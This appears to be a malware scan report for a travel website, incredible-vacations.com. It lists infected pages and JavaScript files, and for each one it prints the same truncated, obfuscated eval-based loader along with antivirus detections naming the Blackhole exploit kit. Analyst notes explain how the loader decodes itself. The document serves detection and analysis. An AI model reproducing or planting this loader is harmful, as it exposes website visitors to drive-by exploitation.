Request | Server response | Status |
http://incredible-vacations.com/ | 200 OK Content-Length: 37454 Content-Type: text/html | malicious |
Malicious code - confirmed by antivirus engines (see below):
z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["bo"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_17_
... 3492 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}
Analyst note: the excerpt is an obfuscated loader rather than site code. It splits the long string on "_", reads each token as a hexadecimal number, subtracts 13, rebuilds the text with String.fromCharCode and passes the result to eval(); the surrounding try/catch blocks appear to be environment checks meant to hinder automated analysis. The scanner truncated the sample ("bytes are skipped"), so the excerpt is not the complete injected script.
Antivirus reports:
- AntiVir: JS/Blacole.DQ.1
- Avast: JS:Decode-BKS [Trj]
- Ikarus: Virus.JS.Exploit
- nProtect: JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall: TROJ_GEN.F47V0829
- Comodo: Exploit.JS.Blacole.EH
- McAfee-GW-Edition: JS/Exploit-Blacole.gc
- DrWeb: Exploit.BlackHole.197
- Kaspersky: Trojan.JS.Redirector.zu
- Microsoft: Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan: JS:Exploit.BlackHole.BH
- Fortinet: JS/Kryptik.HOL!tr
- McAfee: JS/Exploit-Blacole.gc
- NANO-Antivirus: Trojan.Script.Expack.chwlwn
- F-Secure: JS:Exploit.BlackHole.BH
- AVG: JS/Exploit
- Norman: Blacole.VZ
- GData: JS:Exploit.BlackHole.BH
- Commtouch: Trojan.ZHEK-0
- BitDefender: JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/js/jquery.js | 200 OK Content-Length: 4877 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below):
z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir: JS/Blacole.DQ.1
- Avast: JS:Decode-BKS [Trj]
- Ikarus: Virus.JS.Exploit
- nProtect: JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall: TROJ_GEN.F47V0829
- Comodo: Exploit.JS.Blacole.EH
- McAfee-GW-Edition: JS/Exploit-Blacole.gc
- DrWeb: Exploit.BlackHole.197
- Kaspersky: Trojan.JS.Redirector.zu
- Microsoft: Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan: JS:Exploit.BlackHole.BH
- Fortinet: JS/Kryptik.HOL!tr
- McAfee: JS/Exploit-Blacole.gc
- NANO-Antivirus: Trojan.Script.Expack.chwlwn
- F-Secure: JS:Exploit.BlackHole.BH
- AVG: JS/Exploit
- Norman: Blacole.VZ
- GData: JS:Exploit.BlackHole.BH
- Commtouch: Trojan.ZHEK-0
- BitDefender: JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/js/plugins.js | 200 OK Content-Length: 4877 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below):
z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir: JS/Blacole.DQ.1
- Avast: JS:Decode-BKS [Trj]
- Ikarus: Virus.JS.Exploit
- nProtect: JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall: TROJ_GEN.F47V0829
- Comodo: Exploit.JS.Blacole.EH
- McAfee-GW-Edition: JS/Exploit-Blacole.gc
- DrWeb: Exploit.BlackHole.197
- Kaspersky: Trojan.JS.Redirector.zu
- Microsoft: Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan: JS:Exploit.BlackHole.BH
- Fortinet: JS/Kryptik.HOL!tr
- McAfee: JS/Exploit-Blacole.gc
- NANO-Antivirus: Trojan.Script.Expack.chwlwn
- F-Secure: JS:Exploit.BlackHole.BH
- AVG: JS/Exploit
- Norman: Blacole.VZ
- GData: JS:Exploit.BlackHole.BH
- Commtouch: Trojan.ZHEK-0
- BitDefender: JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/js/number_slideshow.js | 200 OK Content-Length: 8860 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below):
z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir: JS/Blacole.DQ.1
- Avast: JS:Decode-BKS [Trj]
- Ikarus: Virus.JS.Exploit
- nProtect: JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall: TROJ_GEN.F47V0829
- Comodo: Exploit.JS.Blacole.EH
- McAfee-GW-Edition: JS/Exploit-Blacole.gc
- DrWeb: Exploit.BlackHole.197
- Kaspersky: Trojan.JS.Redirector.zu
- Microsoft: Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan: JS:Exploit.BlackHole.BH
- Fortinet: JS/Kryptik.HOL!tr
- McAfee: JS/Exploit-Blacole.gc
- NANO-Antivirus: Trojan.Script.Expack.chwlwn
- F-Secure: JS:Exploit.BlackHole.BH
- AVG: JS/Exploit
- Norman: Blacole.VZ
- GData: JS:Exploit.BlackHole.BH
- Commtouch: Trojan.ZHEK-0
- BitDefender: JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/js/crawler.js | 200 OK Content-Length: 14448 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below):
z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir: JS/Blacole.DQ.1
- Avast: JS:Decode-BKS [Trj]
- Ikarus: Virus.JS.Exploit
- nProtect: JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall: TROJ_GEN.F47V0829
- Comodo: Exploit.JS.Blacole.EH
- McAfee-GW-Edition: JS/Exploit-Blacole.gc
- DrWeb: Exploit.BlackHole.197
- Kaspersky: Trojan.JS.Redirector.zu
- Microsoft: Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan: JS:Exploit.BlackHole.BH
- Fortinet: JS/Kryptik.HOL!tr
- McAfee: JS/Exploit-Blacole.gc
- NANO-Antivirus: Trojan.Script.Expack.chwlwn
- F-Secure: JS:Exploit.BlackHole.BH
- AVG: JS/Exploit
- Norman: Blacole.VZ
- GData: JS:Exploit.BlackHole.BH
- Commtouch: Trojan.ZHEK-0
- BitDefender: JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/index.php | 200 OK Content-Length: 41053 Content-Type: text/html | malicious |
Malicious code - confirmed by antivirus engines (see below):
z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["bo"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_17_
... 3492 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir: JS/Blacole.DQ.1
- Avast: JS:Decode-BKS [Trj]
- Ikarus: Virus.JS.Exploit
- nProtect: JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall: TROJ_GEN.F47V0829
- Comodo: Exploit.JS.Blacole.EH
- McAfee-GW-Edition: JS/Exploit-Blacole.gc
- DrWeb: Exploit.BlackHole.197
- Kaspersky: Trojan.JS.Redirector.zu
- Microsoft: Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan: JS:Exploit.BlackHole.BH
- Fortinet: JS/Kryptik.HOL!tr
- McAfee: JS/Exploit-Blacole.gc
- NANO-Antivirus: Trojan.Script.Expack.chwlwn
- F-Secure: JS:Exploit.BlackHole.BH
- AVG: JS/Exploit
- Norman: Blacole.VZ
- GData: JS:Exploit.BlackHole.BH
- Commtouch: Trojan.ZHEK-0
- BitDefender: JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/../js/jquery.js | 200 OK Content-Length: 4877 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below):
z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}
Analyst note: the request path for this row contains "../"; once normalized it is /js/jquery.js, the file already reported above with the same Content-Length (4877). This row, and the later rows whose paths contain "../js/", are therefore most likely repeat findings for the same files rather than additional infected files.
Antivirus reports:
- AntiVir: JS/Blacole.DQ.1
- Avast: JS:Decode-BKS [Trj]
- Ikarus: Virus.JS.Exploit
- nProtect: JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall: TROJ_GEN.F47V0829
- Comodo: Exploit.JS.Blacole.EH
- McAfee-GW-Edition: JS/Exploit-Blacole.gc
- DrWeb: Exploit.BlackHole.197
- Kaspersky: Trojan.JS.Redirector.zu
- Microsoft: Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan: JS:Exploit.BlackHole.BH
- Fortinet: JS/Kryptik.HOL!tr
- McAfee: JS/Exploit-Blacole.gc
- NANO-Antivirus: Trojan.Script.Expack.chwlwn
- F-Secure: JS:Exploit.BlackHole.BH
- AVG: JS/Exploit
- Norman: Blacole.VZ
- GData: JS:Exploit.BlackHole.BH
- Commtouch: Trojan.ZHEK-0
- BitDefender: JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/../js/plugins.js | 200 OK Content-Length: 4877 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below):
z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir: JS/Blacole.DQ.1
- Avast: JS:Decode-BKS [Trj]
- Ikarus: Virus.JS.Exploit
- nProtect: JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall: TROJ_GEN.F47V0829
- Comodo: Exploit.JS.Blacole.EH
- McAfee-GW-Edition: JS/Exploit-Blacole.gc
- DrWeb: Exploit.BlackHole.197
- Kaspersky: Trojan.JS.Redirector.zu
- Microsoft: Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan: JS:Exploit.BlackHole.BH
- Fortinet: JS/Kryptik.HOL!tr
- McAfee: JS/Exploit-Blacole.gc
- NANO-Antivirus: Trojan.Script.Expack.chwlwn
- F-Secure: JS:Exploit.BlackHole.BH
- AVG: JS/Exploit
- Norman: Blacole.VZ
- GData: JS:Exploit.BlackHole.BH
- Commtouch: Trojan.ZHEK-0
- BitDefender: JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/../js/number_slideshow.js | 200 OK Content-Length: 8860 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below):
z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir: JS/Blacole.DQ.1
- Avast: JS:Decode-BKS [Trj]
- Ikarus: Virus.JS.Exploit
- nProtect: JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall: TROJ_GEN.F47V0829
- Comodo: Exploit.JS.Blacole.EH
- McAfee-GW-Edition: JS/Exploit-Blacole.gc
- DrWeb: Exploit.BlackHole.197
- Kaspersky: Trojan.JS.Redirector.zu
- Microsoft: Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan: JS:Exploit.BlackHole.BH
- Fortinet: JS/Kryptik.HOL!tr
- McAfee: JS/Exploit-Blacole.gc
- NANO-Antivirus: Trojan.Script.Expack.chwlwn
- F-Secure: JS:Exploit.BlackHole.BH
- AVG: JS/Exploit
- Norman: Blacole.VZ
- GData: JS:Exploit.BlackHole.BH
- Commtouch: Trojan.ZHEK-0
- BitDefender: JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/../js/crawler.js | 200 OK Content-Length: 14448 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below):
z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir: JS/Blacole.DQ.1
- Avast: JS:Decode-BKS [Trj]
- Ikarus: Virus.JS.Exploit
- nProtect: JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall: TROJ_GEN.F47V0829
- Comodo: Exploit.JS.Blacole.EH
- McAfee-GW-Edition: JS/Exploit-Blacole.gc
- DrWeb: Exploit.BlackHole.197
- Kaspersky: Trojan.JS.Redirector.zu
- Microsoft: Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan: JS:Exploit.BlackHole.BH
- Fortinet: JS/Kryptik.HOL!tr
- McAfee: JS/Exploit-Blacole.gc
- NANO-Antivirus: Trojan.Script.Expack.chwlwn
- F-Secure: JS:Exploit.BlackHole.BH
- AVG: JS/Exploit
- Norman: Blacole.VZ
- GData: JS:Exploit.BlackHole.BH
- Commtouch: Trojan.ZHEK-0
- BitDefender: JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/../north-india-tours/index.php | 200 OK Content-Length: 36637 Content-Type: text/html | malicious |
Malicious code - confirmed by antivirus engines (see below):
z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["bo"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_17_
... 3492 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir: JS/Blacole.DQ.1
- Avast: JS:Decode-BKS [Trj]
- Ikarus: Virus.JS.Exploit
- nProtect: JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall: TROJ_GEN.F47V0829
- Comodo: Exploit.JS.Blacole.EH
- McAfee-GW-Edition: JS/Exploit-Blacole.gc
- DrWeb: Exploit.BlackHole.197
- Kaspersky: Trojan.JS.Redirector.zu
- Microsoft: Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan: JS:Exploit.BlackHole.BH
- Fortinet: JS/Kryptik.HOL!tr
- McAfee: JS/Exploit-Blacole.gc
- NANO-Antivirus: Trojan.Script.Expack.chwlwn
- F-Secure: JS:Exploit.BlackHole.BH
- AVG: JS/Exploit
- Norman: Blacole.VZ
- GData: JS:Exploit.BlackHole.BH
- Commtouch: Trojan.ZHEK-0
- BitDefender: JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/../north-india-tours/../js/jquery.js | 200 OK Content-Length: 4877 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below):
